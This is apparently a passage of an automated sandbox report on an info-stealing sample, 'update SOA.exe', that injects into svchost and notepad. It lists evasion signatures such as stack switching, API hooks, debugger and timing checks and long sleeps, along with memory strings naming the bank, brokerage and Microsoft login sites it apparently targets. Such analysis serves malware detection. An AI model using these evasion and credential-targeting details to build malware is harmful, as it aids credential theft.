            Source: Binary string: notepad.pdb source: svchost.exe, 00000002.00000003.2312196681.0000000003443000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2312112066.000000000341A000.00000004.00000020.00020000.00000000.sdmp, HAdkDWMZRiGMZe.exe, 00000004.00000002.3882959194.0000000000E98000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: HAdkDWMZRiGMZe.exe, 00000004.00000000.2266285714.00000000004CE000.00000002.00000001.01000000.00000005.sdmp, HAdkDWMZRiGMZe.exe, 00000006.00000002.3882332650.00000000004CE000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: update SOA.exe, 00000000.00000003.2070210673.0000000003CD0000.00000004.00001000.00020000.00000000.sdmp, update SOA.exe, 00000000.00000003.2071406574.0000000004890000.00000004.00001000.00020000.00000000.sdmp, update SOA.exe, 00000000.00000003.2070693180.00000000046F0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2250582687.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2343632183.0000000003B9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2252532945.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, notepad.exe, 00000005.00000003.2349001032.0000000004AEC000.00000004.00000020.00020000.00000000.sdmp, notepad.exe, 00000005.00000002.3884211097.0000000004E3E000.00000040.00001000.00020000.00000000.sdmp, notepad.exe, 00000005.00000003.2347352548.0000000004935000.00000004.00000020.00020000.00000000.sdmp, notepad.exe, 00000005.00000002.3884211097.0000000004CA0000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: update SOA.exe, 00000000.00000003.2070210673.0000000003CD0000.00000004.00001000.00020000.00000000.sdmp, update SOA.exe, 00000000.00000003.2071406574.0000000004890000.00000004.00001000.00020000.00000000.sdmp, update SOA.exe, 00000000.00000003.2070693180.00000000046F0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2250582687.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2343632183.0000000003B9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2252532945.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, notepad.exe, notepad.exe, 00000005.00000003.2349001032.0000000004AEC000.00000004.00000020.00020000.00000000.sdmp, notepad.exe, 00000005.00000002.3884211097.0000000004E3E000.00000040.00001000.00020000.00000000.sdmp, notepad.exe, 00000005.00000003.2347352548.0000000004935000.00000004.00000020.00020000.00000000.sdmp, notepad.exe, 00000005.00000002.3884211097.0000000004CA0000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: notepad.exe, 00000005.00000002.3882543699.0000000002E77000.00000004.00000020.00020000.00000000.sdmp, notepad.exe, 00000005.00000002.3885110150.00000000052CC000.00000004.10000000.00040000.00000000.sdmp, HAdkDWMZRiGMZe.exe, 00000006.00000002.3884241981.00000000030BC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2635917732.000000002370C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: notepad.exe, 00000005.00000002.3882543699.0000000002E77000.00000004.00000020.00020000.00000000.sdmp, notepad.exe, 00000005.00000002.3885110150.00000000052CC000.00000004.10000000.00040000.00000000.sdmp, HAdkDWMZRiGMZe.exe, 00000006.00000002.3884241981.00000000030BC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2635917732.000000002370C000.00000004.80000000.00040000.00000000.sdmp
            Source: update SOA.exeStatic PE information: real checksum: 0xa2135 should be: 0x15a0bc
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041D0A4 push 0000000Dh; iretd 2_2_0041D0CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041491A push edx; ret 2_2_00414954
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040AAEC push ecx; iretd 2_2_0040AAED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00413BE3 push eax; retf 2_2_00413BE4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041EBA0 push esp; iretd 2_2_0041EBDC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041EBA3 push esp; iretd 2_2_0041EBDC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040ABA5 push edx; retf 2_2_0040ABA9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00403430 push eax; ret 2_2_00403432
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040D43B push es; retf 2_2_0040D455
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00401CE0 push ds; iretd 2_2_00401DEB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004015DF push 00000028h; ret 2_2_004015F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004085F8 push eax; ret 2_2_00408602
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00416643 pushfd ; iretd 2_2_00416658
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A309AD push ecx; mov dword ptr [esp], ecx2_2_03A309B6
            Source: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exeCode function: 4_2_055AD115 push es; retf 4_2_055AD12F
            Source: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exeCode function: 4_2_055B45F4 push edx; ret 4_2_055B462E
            Source: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exeCode function: 4_2_055AA87F push edx; retf 4_2_055AA883
            Source: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exeCode function: 4_2_055B38BD push eax; retf 4_2_055B38BE
            Source: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exeCode function: 4_2_055B631D pushfd ; iretd 4_2_055B6332
            Source: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exeCode function: 4_2_055A82D2 push eax; ret 4_2_055A82DC
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_04CD09AD push ecx; mov dword ptr [esp], ecx5_2_04CD09B6
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_02B93210 pushfd ; iretd 5_2_02B93225
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_02B851C5 push eax; ret 5_2_02B851CF
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_02B907B0 push eax; retf 5_2_02B907B1
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_02B9B770 push esp; iretd 5_2_02B9B7A9
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_02B87772 push edx; retf 5_2_02B87776
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_02B9B76D push esp; iretd 5_2_02B9B7A9
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_02B914E7 push edx; ret 5_2_02B91521
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_02BA0A1B push edi; retf 5_2_02BA0A39
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_02B9DA54 push esi; retf 5_2_02B9DA5A
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_02B9BF0D push esi; ret 5_2_02B9BF10
            Source: C:\Windows\SysWOW64\notepad.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\notepad.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\notepad.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\notepad.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\notepad.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Switches to a custom stack to bypass stack traces
            Source: C:\Users\user\Desktop\update SOA.exeAPI/Special instruction interceptor: Address: 42F668C
            Source: C:\Windows\SysWOW64\notepad.exeAPI/Special instruction interceptor: Address: 7FF8C88ED324
            Source: C:\Windows\SysWOW64\notepad.exeAPI/Special instruction interceptor: Address: 7FF8C88ED7E4
            Source: C:\Windows\SysWOW64\notepad.exeAPI/Special instruction interceptor: Address: 7FF8C88ED944
            Source: C:\Windows\SysWOW64\notepad.exeAPI/Special instruction interceptor: Address: 7FF8C88ED504
            Source: C:\Windows\SysWOW64\notepad.exeAPI/Special instruction interceptor: Address: 7FF8C88ED544
            Source: C:\Windows\SysWOW64\notepad.exeAPI/Special instruction interceptor: Address: 7FF8C88ED1E4
            Source: C:\Windows\SysWOW64\notepad.exeAPI/Special instruction interceptor: Address: 7FF8C88F0154
            Source: C:\Windows\SysWOW64\notepad.exeAPI/Special instruction interceptor: Address: 7FF8C88EDA44
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAD1C0 rdtsc 2_2_03AAD1C0
            Source: C:\Windows\SysWOW64\notepad.exeWindow / User API: threadDelayed 2124Jump to behavior
            Source: C:\Windows\SysWOW64\notepad.exeWindow / User API: threadDelayed 7848Jump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
            Source: C:\Windows\SysWOW64\notepad.exeAPI coverage: 3.3 %
            Source: C:\Windows\SysWOW64\notepad.exe TID: 7120Thread sleep count: 2124 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\notepad.exe TID: 7120Thread sleep time: -4248000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\notepad.exe TID: 7120Thread sleep count: 7848 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\notepad.exe TID: 7120Thread sleep time: -15696000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe TID: 5608Thread sleep time: -50000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe TID: 5608Thread sleep time: -39000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\notepad.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\notepad.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\notepad.exeCode function: 5_2_02B9C520 FindFirstFileW,FindNextFileW,FindClose,5_2_02B9C520
            Source: K4394f5.5.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
            Source: K4394f5.5.drBinary or memory string: discord.comVMware20,11696428655f
            Source: K4394f5.5.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
            Source: K4394f5.5.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
            Source: K4394f5.5.drBinary or memory string: global block list test formVMware20,11696428655
            Source: K4394f5.5.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
            Source: notepad.exe, 00000005.00000002.3887050160.0000000007D9A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: (1eractive Brokers - EU WestVMware20,11696428655n
            Source: K4394f5.5.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
            Source: K4394f5.5.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
            Source: K4394f5.5.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
            Source: K4394f5.5.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
            Source: K4394f5.5.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
            Source: K4394f5.5.drBinary or memory string: outlook.office365.comVMware20,11696428655t
            Source: K4394f5.5.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
            Source: K4394f5.5.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
            Source: notepad.exe, 00000005.00000002.3887050160.0000000007D9A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,116mT
            Source: K4394f5.5.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
            Source: firefox.exe, 00000009.00000002.2637250023.000002842364D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: K4394f5.5.drBinary or memory string: outlook.office.comVMware20,11696428655s
            Source: K4394f5.5.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
            Source: K4394f5.5.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
            Source: K4394f5.5.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
            Source: notepad.exe, 00000005.00000002.3882543699.0000000002E77000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll!(
            Source: K4394f5.5.drBinary or memory string: AMC password management pageVMware20,11696428655
            Source: K4394f5.5.drBinary or memory string: tasks.office.comVMware20,11696428655o
            Source: HAdkDWMZRiGMZe.exe, 00000006.00000002.3883082556.000000000111F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll;
            Source: K4394f5.5.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
            Source: K4394f5.5.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
            Source: K4394f5.5.drBinary or memory string: interactivebrokers.comVMware20,11696428655
            Source: notepad.exe, 00000005.00000002.3887050160.0000000007D9A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ebrokers.co.inVMware20,11696428655d
            Source: K4394f5.5.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
            Source: K4394f5.5.drBinary or memory string: dev.azure.comVMware20,11696428655j
            Source: K4394f5.5.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
            Source: K4394f5.5.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
            Source: K4394f5.5.drBinary or memory string: bankofamerica.comVMware20,11696428655x
            Source: notepad.exe, 00000005.00000002.3887050160.0000000007D9A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: eractive Brokers - EU WestVMware20,11696428655n
            Source: K4394f5.5.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
            Source: K4394f5.5.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
            Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\notepad.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAD1C0 rdtsc 2_2_03AAD1C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417883 LdrLoadDll,2_2_00417883
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A533A5 mov eax, dword ptr fs:[00000030h]2_2_03A533A5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A633A0 mov eax, dword ptr fs:[00000030h]2_2_03A633A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A633A0 mov eax, dword ptr fs:[00000030h]2_2_03A633A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2E388 mov eax, dword ptr fs:[00000030h]2_2_03A2E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2E388 mov eax, dword ptr fs:[00000030h]2_2_03A2E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2E388 mov eax, dword ptr fs:[00000030h]2_2_03A2E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5438F mov eax, dword ptr fs:[00000030h]2_2_03A5438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5438F mov eax, dword ptr fs:[00000030h]2_2_03A5438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B0539D mov eax, dword ptr fs:[00000030h]2_2_03B0539D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A8739A mov eax, dword ptr fs:[00000030h]2_2_03A8739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A8739A mov eax, dword ptr fs:[00000030h]2_2_03A8739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A28397 mov eax, dword ptr fs:[00000030h]2_2_03A28397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A28397 mov eax, dword ptr fs:[00000030h]2_2_03A28397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A28397 mov eax, dword ptr fs:[00000030h]2_2_03A28397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AEF3E6 mov eax, dword ptr fs:[00000030h]2_2_03AEF3E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B053FC mov eax, dword ptr fs:[00000030h]2_2_03B053FC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A403E9 mov eax, dword ptr fs:[00000030h]2_2_03A403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A403E9 mov eax, dword ptr fs:[00000030h]2_2_03A403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A403E9 mov eax, dword ptr fs:[00000030h]2_2_03A403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A403E9 mov eax, dword ptr fs:[00000030h]2_2_03A403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A403E9 mov eax, dword ptr fs:[00000030h]2_2_03A403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A403E9 mov eax, dword ptr fs:[00000030h]2_2_03A403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A403E9 mov eax, dword ptr fs:[00000030h]2_2_03A403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A403E9 mov eax, dword ptr fs:[00000030h]2_2_03A403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4E3F0 mov eax, dword ptr fs:[00000030h]2_2_03A4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4E3F0 mov eax, dword ptr fs:[00000030h]2_2_03A4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4E3F0 mov eax, dword ptr fs:[00000030h]2_2_03A4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A663FF mov eax, dword ptr fs:[00000030h]2_2_03A663FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AEC3CD mov eax, dword ptr fs:[00000030h]2_2_03AEC3CD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03A3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03A3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03A3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03A3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03A3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03A3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A383C0 mov eax, dword ptr fs:[00000030h]2_2_03A383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A383C0 mov eax, dword ptr fs:[00000030h]2_2_03A383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A383C0 mov eax, dword ptr fs:[00000030h]2_2_03A383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A383C0 mov eax, dword ptr fs:[00000030h]2_2_03A383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB63C0 mov eax, dword ptr fs:[00000030h]2_2_03AB63C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AEB3D0 mov ecx, dword ptr fs:[00000030h]2_2_03AEB3D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF132D mov eax, dword ptr fs:[00000030h]2_2_03AF132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF132D mov eax, dword ptr fs:[00000030h]2_2_03AF132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5F32A mov eax, dword ptr fs:[00000030h]2_2_03A5F32A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A27330 mov eax, dword ptr fs:[00000030h]2_2_03A27330
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB930B mov eax, dword ptr fs:[00000030h]2_2_03AB930B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB930B mov eax, dword ptr fs:[00000030h]2_2_03AB930B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB930B mov eax, dword ptr fs:[00000030h]2_2_03AB930B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6A30B mov eax, dword ptr fs:[00000030h]2_2_03A6A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6A30B mov eax, dword ptr fs:[00000030h]2_2_03A6A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6A30B mov eax, dword ptr fs:[00000030h]2_2_03A6A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2C310 mov ecx, dword ptr fs:[00000030h]2_2_03A2C310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A50310 mov ecx, dword ptr fs:[00000030h]2_2_03A50310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AEF367 mov eax, dword ptr fs:[00000030h]2_2_03AEF367
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD437C mov eax, dword ptr fs:[00000030h]2_2_03AD437C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A37370 mov eax, dword ptr fs:[00000030h]2_2_03A37370
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A37370 mov eax, dword ptr fs:[00000030h]2_2_03A37370
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A37370 mov eax, dword ptr fs:[00000030h]2_2_03A37370
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB2349 mov eax, dword ptr fs:[00000030h]2_2_03AB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2D34C mov eax, dword ptr fs:[00000030h]2_2_03A2D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2D34C mov eax, dword ptr fs:[00000030h]2_2_03A2D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B05341 mov eax, dword ptr fs:[00000030h]2_2_03B05341
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A29353 mov eax, dword ptr fs:[00000030h]2_2_03A29353
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A29353 mov eax, dword ptr fs:[00000030h]2_2_03A29353
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB035C mov eax, dword ptr fs:[00000030h]2_2_03AB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB035C mov eax, dword ptr fs:[00000030h]2_2_03AB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB035C mov eax, dword ptr fs:[00000030h]2_2_03AB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB035C mov ecx, dword ptr fs:[00000030h]2_2_03AB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB035C mov eax, dword ptr fs:[00000030h]2_2_03AB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB035C mov eax, dword ptr fs:[00000030h]2_2_03AB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFA352 mov eax, dword ptr fs:[00000030h]2_2_03AFA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A402A0 mov eax, dword ptr fs:[00000030h]2_2_03A402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A402A0 mov eax, dword ptr fs:[00000030h]2_2_03A402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A452A0 mov eax, dword ptr fs:[00000030h]2_2_03A452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A452A0 mov eax, dword ptr fs:[00000030h]2_2_03A452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A452A0 mov eax, dword ptr fs:[00000030h]2_2_03A452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A452A0 mov eax, dword ptr fs:[00000030h]2_2_03A452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF92A6 mov eax, dword ptr fs:[00000030h]2_2_03AF92A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF92A6 mov eax, dword ptr fs:[00000030h]2_2_03AF92A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF92A6 mov eax, dword ptr fs:[00000030h]2_2_03AF92A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF92A6 mov eax, dword ptr fs:[00000030h]2_2_03AF92A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC62A0 mov eax, dword ptr fs:[00000030h]2_2_03AC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC62A0 mov ecx, dword ptr fs:[00000030h]2_2_03AC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC62A0 mov eax, dword ptr fs:[00000030h]2_2_03AC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC62A0 mov eax, dword ptr fs:[00000030h]2_2_03AC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC62A0 mov eax, dword ptr fs:[00000030h]2_2_03AC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC62A0 mov eax, dword ptr fs:[00000030h]2_2_03AC62A0
